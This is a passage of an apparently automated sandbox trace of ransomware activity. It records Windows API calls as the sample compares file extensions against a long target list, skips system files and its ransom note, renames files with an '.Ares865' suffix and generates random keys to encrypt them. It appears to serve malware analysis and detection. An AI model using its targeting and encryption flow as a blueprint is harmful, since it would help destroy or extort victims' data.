lstrlenW (lpString="db3") returned 3 [0089.590] lstrcmpiW (lpString1="png", lpString2="db3") returned 1 [0089.590] lstrlenW (lpString="dbf") returned 3 [0089.590] lstrcmpiW (lpString1="png", lpString2="dbf") returned 1 [0089.590] lstrlenW (lpString="mdf") returned 3 [0089.590] lstrcmpiW (lpString1="png", lpString2="mdf") returned 1 [0089.590] lstrlenW (lpString="mdb") returned 3 [0089.590] lstrcmpiW (lpString1="png", lpString2="mdb") returned 1 [0089.590] lstrlenW (lpString="sql") returned 3 [0089.590] lstrcmpiW (lpString1="png", lpString2="sql") returned -1 [0089.590] lstrlenW (lpString="sqlite") returned 6 [0089.590] lstrcmpiW (lpString1="ay.png", lpString2="sqlite") returned -1 [0089.590] lstrlenW (lpString="sqlite3") returned 7 [0089.590] lstrcmpiW (lpString1="lay.png", lpString2="sqlite3") returned -1 [0089.590] lstrlenW (lpString="sqlitedb") returned 8 [0089.590] lstrcmpiW (lpString1="rlay.png", lpString2="sqlitedb") returned -1 [0089.590] lstrlenW (lpString="xml") returned 3 [0089.590] lstrcmpiW (lpString1="png", lpString2="xml") returned -1 [0089.590] lstrlenW (lpString="$er") returned 3 [0089.590] lstrcmpiW (lpString1="png", lpString2="$er") returned 1 [0089.590] lstrlenW (lpString="4dd") returned 3 [0089.590] lstrcmpiW (lpString1="png", lpString2="4dd") returned 1 [0089.590] lstrlenW (lpString="4dl") returned 3 [0089.590] lstrcmpiW (lpString1="png", lpString2="4dl") returned 1 [0089.590] lstrlenW (lpString="^^^") returned 3 [0089.590] lstrcmpiW (lpString1="png", lpString2="^^^") returned 1 [0089.590] lstrlenW (lpString="abs") returned 3 [0089.590] lstrcmpiW (lpString1="png", lpString2="abs") returned 1 [0089.590] lstrlenW (lpString="abx") returned 3 [0089.590] lstrcmpiW (lpString1="png", lpString2="abx") returned 1 [0089.590] lstrlenW (lpString="accdb") returned 5 [0089.590] lstrcmpiW (lpString1="y.png", lpString2="accdb") returned 1 [0089.590] lstrlenW (lpString="accdc") returned 5 [0089.590] lstrcmpiW (lpString1="y.png", lpString2="accdc") returned 1 [0089.591] lstrlenW (lpString="accde") returned 5 [0089.591] lstrcmpiW (lpString1="y.png", lpString2="accde") returned 1 [0089.591] lstrlenW (lpString="accdr") returned 5 [0089.591] lstrcmpiW (lpString1="y.png", lpString2="accdr") returned 1 [0089.591] lstrlenW (lpString="accdt") returned 5 [0089.591] lstrcmpiW (lpString1="y.png", lpString2="accdt") returned 1 [0089.591] lstrlenW (lpString="accdw") returned 5 [0089.591] lstrcmpiW (lpString1="y.png", lpString2="accdw") returned 1 [0089.591] lstrlenW (lpString="accft") returned 5 [0089.591] lstrcmpiW (lpString1="y.png", lpString2="accft") returned 1 [0089.591] lstrlenW (lpString="adb") returned 3 [0089.591] lstrcmpiW (lpString1="png", lpString2="adb") returned 1 [0089.591] lstrlenW (lpString="adb") returned 3 [0089.591] lstrcmpiW (lpString1="png", lpString2="adb") returned 1 [0089.591] lstrlenW (lpString="ade") returned 3 [0089.591] lstrcmpiW (lpString1="png", lpString2="ade") returned 1 [0089.591] lstrlenW (lpString="adf") returned 3 [0089.591] lstrcmpiW (lpString1="png", lpString2="adf") returned 1 [0089.591] lstrlenW (lpString="adn") returned 3 [0089.591] lstrcmpiW (lpString1="png", lpString2="adn") returned 1 [0089.591] lstrlenW (lpString="adp") returned 3 [0089.591] lstrcmpiW (lpString1="png", lpString2="adp") returned 1 [0089.591] lstrlenW (lpString="alf") returned 3 [0089.591] lstrcmpiW (lpString1="png", lpString2="alf") returned 1 [0089.591] lstrlenW (lpString="ask") returned 3 [0089.591] lstrcmpiW (lpString1="png", lpString2="ask") returned 1 [0089.591] lstrlenW (lpString="btr") returned 3 [0089.591] lstrcmpiW (lpString1="png", lpString2="btr") returned 1 [0089.591] lstrlenW (lpString="cat") returned 3 [0089.591] lstrcmpiW (lpString1="png", lpString2="cat") returned 1 [0089.591] lstrlenW (lpString="cdb") returned 3 [0089.591] lstrcmpiW (lpString1="png", lpString2="cdb") returned 1 [0089.591] lstrlenW (lpString="ckp") returned 3 [0089.591] lstrcmpiW (lpString1="png", lpString2="ckp") returned 1 [0089.591] lstrlenW (lpString="cma") returned 3 [0089.591] lstrcmpiW (lpString1="png", lpString2="cma") returned 1 [0089.591] lstrlenW (lpString="cpd") returned 3 [0089.591] lstrcmpiW (lpString1="png", lpString2="cpd") returned 1 [0089.591] lstrlenW (lpString="dacpac") returned 6 [0089.592] lstrcmpiW (lpString1="ay.png", lpString2="dacpac") returned -1 [0089.592] lstrlenW (lpString="dad") returned 3 [0089.592] lstrcmpiW (lpString1="png", lpString2="dad") returned 1 [0089.592] lstrlenW (lpString="dadiagrams") returned 10 [0089.592] lstrcmpiW (lpString1="verlay.png", lpString2="dadiagrams") returned 1 [0089.592] lstrlenW (lpString="daschema") returned 8 [0089.592] lstrcmpiW (lpString1="rlay.png", lpString2="daschema") returned 1 [0089.592] lstrlenW (lpString="db-journal") returned 10 [0089.592] lstrcmpiW (lpString1="verlay.png", lpString2="db-journal") returned 1 [0089.592] lstrlenW (lpString="db-shm") returned 6 [0089.592] lstrcmpiW (lpString1="ay.png", lpString2="db-shm") returned -1 [0089.592] lstrlenW (lpString="db-wal") returned 6 [0089.592] lstrcmpiW (lpString1="ay.png", lpString2="db-wal") returned -1 [0089.592] lstrlenW (lpString="dbc") returned 3 [0089.592] lstrcmpiW (lpString1="png", lpString2="dbc") returned 1 [0089.592] lstrlenW (lpString="dbs") returned 3 [0089.592] lstrcmpiW (lpString1="png", lpString2="dbs") returned 1 [0089.592] lstrlenW (lpString="dbt") returned 3 [0089.592] lstrcmpiW (lpString1="png", lpString2="dbt") returned 1 [0089.592] lstrlenW (lpString="dbv") returned 3 [0089.592] lstrcmpiW (lpString1="png", lpString2="dbv") returned 1 [0089.592] lstrlenW (lpString="dbx") returned 3 [0089.592] lstrcmpiW (lpString1="png", lpString2="dbx") returned 1 [0089.592] lstrlenW (lpString="dcb") returned 3 [0089.592] lstrcmpiW (lpString1="png", lpString2="dcb") returned 1 [0089.592] lstrlenW (lpString="dct") returned 3 [0089.592] lstrcmpiW (lpString1="png", lpString2="dct") returned 1 [0089.592] lstrlenW (lpString="dcx") returned 3 [0089.592] lstrcmpiW (lpString1="png", lpString2="dcx") returned 1 [0089.592] lstrlenW (lpString="ddl") returned 3 [0089.592] lstrcmpiW (lpString1="png", lpString2="ddl") returned 1 [0089.592] lstrlenW (lpString="dlis") returned 4 [0089.592] lstrcmpiW (lpString1=".png", lpString2="dlis") returned -1 [0089.592] lstrlenW (lpString="dp1") returned 3 [0089.592] lstrcmpiW (lpString1="png", lpString2="dp1") returned 1 [0089.592] lstrlenW (lpString="dqy") returned 3 [0089.592] lstrcmpiW (lpString1="png", lpString2="dqy") returned 1 [0089.592] lstrlenW (lpString="dsk") returned 3 [0089.592] lstrcmpiW (lpString1="png", lpString2="dsk") returned 1 [0089.593] lstrlenW (lpString="dsn") returned 3 [0089.593] lstrcmpiW (lpString1="png", lpString2="dsn") returned 1 [0089.593] lstrlenW (lpString="dtsx") returned 4 [0089.593] lstrcmpiW (lpString1=".png", lpString2="dtsx") returned -1 [0089.593] lstrlenW (lpString="dxl") returned 3 [0089.593] lstrcmpiW (lpString1="png", lpString2="dxl") returned 1 [0089.593] lstrlenW (lpString="eco") returned 3 [0089.593] lstrcmpiW (lpString1="png", lpString2="eco") returned 1 [0089.593] lstrlenW (lpString="ecx") returned 3 [0089.593] lstrcmpiW (lpString1="png", lpString2="ecx") returned 1 [0089.593] lstrlenW (lpString="edb") returned 3 [0089.593] lstrcmpiW (lpString1="png", lpString2="edb") returned 1 [0089.593] lstrlenW (lpString="epim") returned 4 [0089.593] lstrcmpiW (lpString1=".png", lpString2="epim") returned -1 [0089.593] lstrlenW (lpString="fcd") returned 3 [0089.593] lstrcmpiW (lpString1="png", lpString2="fcd") returned 1 [0089.593] lstrlenW (lpString="fdb") returned 3 [0089.593] lstrcmpiW (lpString1="png", lpString2="fdb") returned 1 [0089.593] lstrlenW (lpString="fic") returned 3 [0089.593] lstrcmpiW (lpString1="png", lpString2="fic") returned 1 [0089.593] lstrlenW (lpString="flexolibrary") returned 12 [0089.593] lstrlenW (lpString="fm5") returned 3 [0089.593] lstrcmpiW (lpString1="png", lpString2="fm5") returned 1 [0089.593] lstrlenW (lpString="fmp") returned 3 [0089.593] lstrcmpiW (lpString1="png", lpString2="fmp") returned 1 [0089.593] lstrlenW (lpString="fmp12") returned 5 [0089.593] lstrcmpiW (lpString1="y.png", lpString2="fmp12") returned 1 [0089.593] lstrlenW (lpString="fmpsl") returned 5 [0089.593] lstrcmpiW (lpString1="y.png", lpString2="fmpsl") returned 1 [0089.593] lstrlenW (lpString="fol") returned 3 [0089.593] lstrcmpiW (lpString1="png", lpString2="fol") returned 1 [0089.593] lstrlenW (lpString="fp3") returned 3 [0089.593] lstrcmpiW (lpString1="png", lpString2="fp3") returned 1 [0089.593] lstrlenW (lpString="fp4") returned 3 [0089.593] lstrcmpiW (lpString1="png", lpString2="fp4") returned 1 [0089.593] lstrlenW (lpString="fp5") returned 3 [0089.593] lstrcmpiW (lpString1="png", lpString2="fp5") returned 1 [0089.593] lstrlenW (lpString="fp7") returned 3 [0089.593] lstrcmpiW (lpString1="png", lpString2="fp7") returned 1 [0089.594] lstrlenW (lpString="fpt") returned 3 [0089.594] lstrcmpiW (lpString1="png", lpString2="fpt") returned 1 [0089.594] lstrlenW (lpString="frm") returned 3 [0089.594] lstrcmpiW (lpString1="png", lpString2="frm") returned 1 [0089.594] lstrlenW (lpString="gdb") returned 3 [0089.594] lstrcmpiW (lpString1="png", lpString2="gdb") returned 1 [0089.594] lstrlenW (lpString="gdb") returned 3 [0089.594] lstrcmpiW (lpString1="png", lpString2="gdb") returned 1 [0089.594] lstrlenW (lpString="grdb") returned 4 [0089.594] lstrcmpiW (lpString1=".png", lpString2="grdb") returned -1 [0089.594] lstrlenW (lpString="gwi") returned 3 [0089.594] lstrcmpiW (lpString1="png", lpString2="gwi") returned 1 [0089.594] lstrlenW (lpString="hdb") returned 3 [0089.594] lstrcmpiW (lpString1="png", lpString2="hdb") returned 1 [0089.594] lstrlenW (lpString="his") returned 3 [0089.594] lstrcmpiW (lpString1="png", lpString2="his") returned 1 [0089.594] lstrlenW (lpString="ib") returned 2 [0089.594] lstrcmpiW (lpString1="ng", lpString2="ib") returned 1 [0089.594] lstrlenW (lpString="idb") returned 3 [0089.594] lstrcmpiW (lpString1="png", lpString2="idb") returned 1 [0089.594] lstrlenW (lpString="ihx") returned 3 [0089.594] lstrcmpiW (lpString1="png", lpString2="ihx") returned 1 [0089.594] lstrlenW (lpString="itdb") returned 4 [0089.594] lstrcmpiW (lpString1=".png", lpString2="itdb") returned -1 [0089.594] lstrlenW (lpString="itw") returned 3 [0089.594] lstrcmpiW (lpString1="png", lpString2="itw") returned 1 [0089.594] lstrlenW (lpString="jet") returned 3 [0089.594] lstrcmpiW (lpString1="png", lpString2="jet") returned 1 [0089.594] lstrlenW (lpString="jtx") returned 3 [0089.594] lstrcmpiW (lpString1="png", lpString2="jtx") returned 1 [0089.594] lstrlenW (lpString="kdb") returned 3 [0089.594] lstrcmpiW (lpString1="png", lpString2="kdb") returned 1 [0089.594] lstrlenW (lpString="kexi") returned 4 [0089.594] lstrcmpiW (lpString1=".png", lpString2="kexi") returned -1 [0089.594] lstrlenW (lpString="kexic") returned 5 [0089.594] lstrcmpiW (lpString1="y.png", lpString2="kexic") returned 1 [0089.594] lstrlenW (lpString="kexis") returned 5 [0089.594] lstrcmpiW (lpString1="y.png", lpString2="kexis") returned 1 [0089.595] lstrlenW (lpString="lgc") returned 3 [0089.595] lstrcmpiW (lpString1="png", lpString2="lgc") returned 1 [0089.595] lstrlenW (lpString="lwx") returned 3 [0089.595] lstrcmpiW (lpString1="png", lpString2="lwx") returned 1 [0089.595] lstrlenW (lpString="maf") returned 3 [0089.595] lstrcmpiW (lpString1="png", lpString2="maf") returned 1 [0089.595] lstrlenW (lpString="maq") returned 3 [0089.595] lstrcmpiW (lpString1="png", lpString2="maq") returned 1 [0089.595] lstrlenW (lpString="mar") returned 3 [0089.595] lstrcmpiW (lpString1="png", lpString2="mar") returned 1 [0089.595] lstrlenW (lpString="marshal") returned 7 [0089.595] lstrcmpiW (lpString1="lay.png", lpString2="marshal") returned -1 [0089.595] lstrlenW (lpString="mas") returned 3 [0089.595] lstrcmpiW (lpString1="png", lpString2="mas") returned 1 [0089.595] lstrlenW (lpString="mav") returned 3 [0089.595] lstrcmpiW (lpString1="png", lpString2="mav") returned 1 [0089.595] lstrlenW (lpString="maw") returned 3 [0089.595] lstrcmpiW (lpString1="png", lpString2="maw") returned 1 [0089.595] lstrlenW (lpString="mdbhtml") returned 7 [0089.595] lstrcmpiW (lpString1="lay.png", lpString2="mdbhtml") returned -1 [0089.595] lstrlenW (lpString="mdn") returned 3 [0089.595] lstrcmpiW (lpString1="png", lpString2="mdn") returned 1 [0089.595] lstrlenW (lpString="mdt") returned 3 [0089.595] lstrcmpiW (lpString1="png", lpString2="mdt") returned 1 [0089.595] lstrlenW (lpString="mfd") returned 3 [0089.595] lstrcmpiW (lpString1="png", lpString2="mfd") returned 1 [0089.595] lstrlenW (lpString="mpd") returned 3 [0089.595] lstrcmpiW (lpString1="png", lpString2="mpd") returned 1 [0089.595] lstrlenW (lpString="mrg") returned 3 [0089.595] lstrcmpiW (lpString1="png", lpString2="mrg") returned 1 [0089.595] lstrlenW (lpString="mud") returned 3 [0089.595] lstrcmpiW (lpString1="png", lpString2="mud") returned 1 [0089.595] lstrlenW (lpString="mwb") returned 3 [0089.595] lstrcmpiW (lpString1="png", lpString2="mwb") returned 1 [0089.595] lstrlenW (lpString="myd") returned 3 [0089.595] lstrcmpiW (lpString1="png", lpString2="myd") returned 1 [0089.595] lstrlenW (lpString="ndf") returned 3 [0089.595] lstrcmpiW (lpString1="png", lpString2="ndf") returned 1 [0089.595] lstrlenW (lpString="nnt") returned 3 [0089.595] lstrcmpiW (lpString1="png", lpString2="nnt") returned 1 [0089.596] lstrlenW (lpString="nrmlib") returned 6 [0089.596] lstrcmpiW (lpString1="ay.png", lpString2="nrmlib") returned -1 [0089.596] lstrlenW (lpString="ns2") returned 3 [0089.596] lstrcmpiW (lpString1="png", lpString2="ns2") returned 1 [0089.596] lstrlenW (lpString="ns3") returned 3 [0089.596] lstrcmpiW (lpString1="png", lpString2="ns3") returned 1 [0089.596] lstrlenW (lpString="ns4") returned 3 [0089.596] lstrcmpiW (lpString1="png", lpString2="ns4") returned 1 [0089.596] lstrlenW (lpString="nsf") returned 3 [0089.596] lstrcmpiW (lpString1="png", lpString2="nsf") returned 1 [0089.596] lstrlenW (lpString="nv") returned 2 [0089.596] lstrcmpiW (lpString1="ng", lpString2="nv") returned -1 [0089.596] lstrlenW (lpString="nv2") returned 3 [0089.596] lstrcmpiW (lpString1="png", lpString2="nv2") returned 1 [0089.596] lstrlenW (lpString="nwdb") returned 4 [0089.596] lstrcmpiW (lpString1=".png", lpString2="nwdb") returned -1 [0089.596] lstrlenW (lpString="nyf") returned 3 [0089.596] lstrcmpiW (lpString1="png", lpString2="nyf") returned 1 [0089.596] lstrlenW (lpString="odb") returned 3 [0089.596] lstrcmpiW (lpString1="png", lpString2="odb") returned 1 [0089.596] lstrlenW (lpString="odb") returned 3 [0089.596] lstrcmpiW (lpString1="png", lpString2="odb") returned 1 [0089.596] lstrlenW (lpString="oqy") returned 3 [0089.596] lstrcmpiW (lpString1="png", lpString2="oqy") returned 1 [0089.596] lstrlenW (lpString="ora") returned 3 [0089.596] lstrcmpiW (lpString1="png", lpString2="ora") returned 1 [0089.596] lstrlenW (lpString="orx") returned 3 [0089.596] lstrcmpiW (lpString1="png", lpString2="orx") returned 1 [0089.596] lstrlenW (lpString="owc") returned 3 [0089.596] lstrcmpiW (lpString1="png", lpString2="owc") returned 1 [0089.596] lstrlenW (lpString="p96") returned 3 [0089.596] lstrcmpiW (lpString1="png", lpString2="p96") returned 1 [0089.596] lstrlenW (lpString="p97") returned 3 [0089.596] lstrcmpiW (lpString1="png", lpString2="p97") returned 1 [0089.596] lstrlenW (lpString="pan") returned 3 [0089.596] lstrcmpiW (lpString1="png", lpString2="pan") returned 1 [0089.596] lstrlenW (lpString="pdb") returned 3 [0089.596] lstrcmpiW (lpString1="png", lpString2="pdb") returned 1 [0089.596] lstrlenW (lpString="pdm") returned 3 [0089.597] lstrcmpiW (lpString1="png", lpString2="pdm") returned 1 [0089.597] lstrlenW (lpString="pnz") returned 3 [0089.597] lstrcmpiW (lpString1="png", lpString2="pnz") returned -1 [0089.597] lstrlenW (lpString="qry") returned 3 [0089.597] lstrcmpiW (lpString1="png", lpString2="qry") returned -1 [0089.597] lstrlenW (lpString="qvd") returned 3 [0089.597] lstrcmpiW (lpString1="png", lpString2="qvd") returned -1 [0089.597] lstrlenW (lpString="rbf") returned 3 [0089.597] lstrcmpiW (lpString1="png", lpString2="rbf") returned -1 [0089.597] lstrlenW (lpString="rctd") returned 4 [0089.597] lstrcmpiW (lpString1=".png", lpString2="rctd") returned -1 [0089.597] lstrlenW (lpString="rod") returned 3 [0089.597] lstrcmpiW (lpString1="png", lpString2="rod") returned -1 [0089.597] lstrlenW (lpString="rodx") returned 4 [0089.597] lstrcmpiW (lpString1=".png", lpString2="rodx") returned -1 [0089.597] lstrlenW (lpString="rpd") returned 3 [0089.597] lstrcmpiW (lpString1="png", lpString2="rpd") returned -1 [0089.597] lstrlenW (lpString="rsd") returned 3 [0089.597] lstrcmpiW (lpString1="png", lpString2="rsd") returned -1 [0089.597] lstrlenW (lpString="sas7bdat") returned 8 [0089.597] lstrcmpiW (lpString1="rlay.png", lpString2="sas7bdat") returned -1 [0089.597] lstrlenW (lpString="sbf") returned 3 [0089.597] lstrcmpiW (lpString1="png", lpString2="sbf") returned -1 [0089.597] lstrlenW (lpString="scx") returned 3 [0089.597] lstrcmpiW (lpString1="png", lpString2="scx") returned -1 [0089.597] lstrlenW (lpString="sdb") returned 3 [0089.597] lstrcmpiW (lpString1="png", lpString2="sdb") returned -1 [0089.597] lstrlenW (lpString="sdc") returned 3 [0089.597] lstrcmpiW (lpString1="png", lpString2="sdc") returned -1 [0089.597] lstrlenW (lpString="sdf") returned 3 [0089.597] lstrcmpiW (lpString1="png", lpString2="sdf") returned -1 [0089.597] lstrlenW (lpString="sis") returned 3 [0089.597] lstrcmpiW (lpString1="png", lpString2="sis") returned -1 [0089.597] lstrlenW (lpString="spq") returned 3 [0089.597] lstrcmpiW (lpString1="png", lpString2="spq") returned -1 [0089.597] lstrlenW (lpString="te") returned 2 [0089.597] lstrcmpiW (lpString1="ng", lpString2="te") returned -1 [0089.597] lstrlenW (lpString="teacher") returned 7 [0089.597] lstrcmpiW (lpString1="lay.png", lpString2="teacher") returned -1 [0089.598] lstrlenW (lpString="tmd") returned 3 [0089.598] lstrcmpiW (lpString1="png", lpString2="tmd") returned -1 [0089.598] lstrlenW (lpString="tps") returned 3 [0089.598] lstrcmpiW (lpString1="png", lpString2="tps") returned -1 [0089.598] lstrlenW (lpString="trc") returned 3 [0089.598] lstrcmpiW (lpString1="png", lpString2="trc") returned -1 [0089.598] lstrlenW (lpString="trc") returned 3 [0089.598] lstrcmpiW (lpString1="png", lpString2="trc") returned -1 [0089.598] lstrlenW (lpString="trm") returned 3 [0089.598] lstrcmpiW (lpString1="png", lpString2="trm") returned -1 [0089.598] lstrlenW (lpString="udb") returned 3 [0089.598] lstrcmpiW (lpString1="png", lpString2="udb") returned -1 [0089.598] lstrlenW (lpString="udl") returned 3 [0089.598] lstrcmpiW (lpString1="png", lpString2="udl") returned -1 [0089.598] lstrlenW (lpString="usr") returned 3 [0089.598] lstrcmpiW (lpString1="png", lpString2="usr") returned -1 [0089.598] lstrlenW (lpString="v12") returned 3 [0089.598] lstrcmpiW (lpString1="png", lpString2="v12") returned -1 [0089.598] lstrlenW (lpString="vis") returned 3 [0089.598] lstrcmpiW (lpString1="png", lpString2="vis") returned -1 [0089.598] lstrlenW (lpString="vpd") returned 3 [0089.598] lstrcmpiW (lpString1="png", lpString2="vpd") returned -1 [0089.598] lstrlenW (lpString="vvv") returned 3 [0089.598] lstrcmpiW (lpString1="png", lpString2="vvv") returned -1 [0089.598] lstrlenW (lpString="wdb") returned 3 [0089.598] lstrcmpiW (lpString1="png", lpString2="wdb") returned -1 [0089.598] lstrlenW (lpString="wmdb") returned 4 [0089.598] lstrcmpiW (lpString1=".png", lpString2="wmdb") returned -1 [0089.598] lstrlenW (lpString="wrk") returned 3 [0089.598] lstrcmpiW (lpString1="png", lpString2="wrk") returned -1 [0089.598] lstrlenW (lpString="xdb") returned 3 [0089.598] lstrcmpiW (lpString1="png", lpString2="xdb") returned -1 [0089.598] lstrlenW (lpString="xld") returned 3 [0089.598] lstrcmpiW (lpString1="png", lpString2="xld") returned -1 [0089.598] lstrlenW (lpString="xmlff") returned 5 [0089.598] lstrcmpiW (lpString1="y.png", lpString2="xmlff") returned 1 [0089.598] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png.Ares865") returned 107 [0089.598] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png.ares865"), dwFlags=0x1) returned 1 [0089.599] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0089.600] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28865) returned 1 [0089.600] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0089.600] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0089.600] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0089.600] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0089.601] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0089.601] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.601] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x73d0, lpName=0x0) returned 0x15c [0089.609] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x73d0) returned 0x190000 [0089.611] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0089.612] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0089.612] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.612] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0089.612] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0089.612] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0089.612] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0089.612] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0089.612] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0089.612] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0089.613] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0089.613] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0089.613] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0089.613] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0089.613] CloseHandle (hObject=0x15c) returned 1 [0089.613] CloseHandle (hObject=0x118) returned 1 [0089.613] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0089.613] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0089.613] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0089.614] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f0c6929, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f0c6929, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc76d9e43, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x99d3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="superbar.png", cAlternateFileName="")) returned 1 [0089.614] lstrcmpiW (lpString1="superbar.png", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.614] lstrcmpiW (lpString1="superbar.png", lpString2="aoldtz.exe") returned 1 [0089.614] lstrcmpiW (lpString1="superbar.png", lpString2=".") returned 1 [0089.614] lstrcmpiW (lpString1="superbar.png", lpString2="..") returned 1 [0089.614] lstrcmpiW (lpString1="superbar.png", lpString2="windows") returned -1 [0089.614] lstrcmpiW (lpString1="superbar.png", lpString2="bootmgr") returned 1 [0089.614] lstrcmpiW (lpString1="superbar.png", lpString2="temp") returned -1 [0089.614] lstrcmpiW (lpString1="superbar.png", lpString2="pagefile.sys") returned 1 [0089.614] lstrcmpiW (lpString1="superbar.png", lpString2="boot") returned 1 [0089.614] lstrcmpiW (lpString1="superbar.png", lpString2="ids.txt") returned 1 [0089.614] lstrcmpiW (lpString1="superbar.png", lpString2="ntuser.dat") returned 1 [0089.614] lstrcmpiW (lpString1="superbar.png", lpString2="perflogs") returned 1 [0089.614] lstrcmpiW (lpString1="superbar.png", lpString2="MSBuild") returned 1 [0089.614] lstrlenW (lpString="superbar.png") returned 12 [0089.614] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png") returned 99 [0089.614] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="superbar.png" | out: lpString1="superbar.png") returned="superbar.png" [0089.614] lstrlenW (lpString="superbar.png") returned 12 [0089.614] lstrlenW (lpString="Ares865") returned 7 [0089.614] lstrcmpiW (lpString1="bar.png", lpString2="Ares865") returned 1 [0089.614] lstrlenW (lpString=".dll") returned 4 [0089.614] lstrcmpiW (lpString1="superbar.png", lpString2=".dll") returned 1 [0089.614] lstrlenW (lpString=".lnk") returned 4 [0089.614] lstrcmpiW (lpString1="superbar.png", lpString2=".lnk") returned 1 [0089.614] lstrlenW (lpString=".ini") returned 4 [0089.614] lstrcmpiW (lpString1="superbar.png", lpString2=".ini") returned 1 [0089.614] lstrlenW (lpString=".sys") returned 4 [0089.614] lstrcmpiW (lpString1="superbar.png", lpString2=".sys") returned 1 [0089.614] lstrlenW (lpString="superbar.png") returned 12 [0089.614] lstrlenW (lpString="bak") returned 3 [0089.614] lstrcmpiW (lpString1="png", lpString2="bak") returned 1 [0089.614] lstrlenW (lpString="ba_") returned 3 [0089.614] lstrcmpiW (lpString1="png", lpString2="ba_") returned 1 [0089.614] lstrlenW (lpString="dbb") returned 3 [0089.614] lstrcmpiW (lpString1="png", lpString2="dbb") returned 1 [0089.614] lstrlenW (lpString="vmdk") returned 4 [0089.614] lstrcmpiW (lpString1=".png", lpString2="vmdk") returned -1 [0089.614] lstrlenW (lpString="rar") returned 3 [0089.615] lstrcmpiW (lpString1="png", lpString2="rar") returned -1 [0089.615] lstrlenW (lpString="zip") returned 3 [0089.615] lstrcmpiW (lpString1="png", lpString2="zip") returned -1 [0089.615] lstrlenW (lpString="tgz") returned 3 [0089.615] lstrcmpiW (lpString1="png", lpString2="tgz") returned 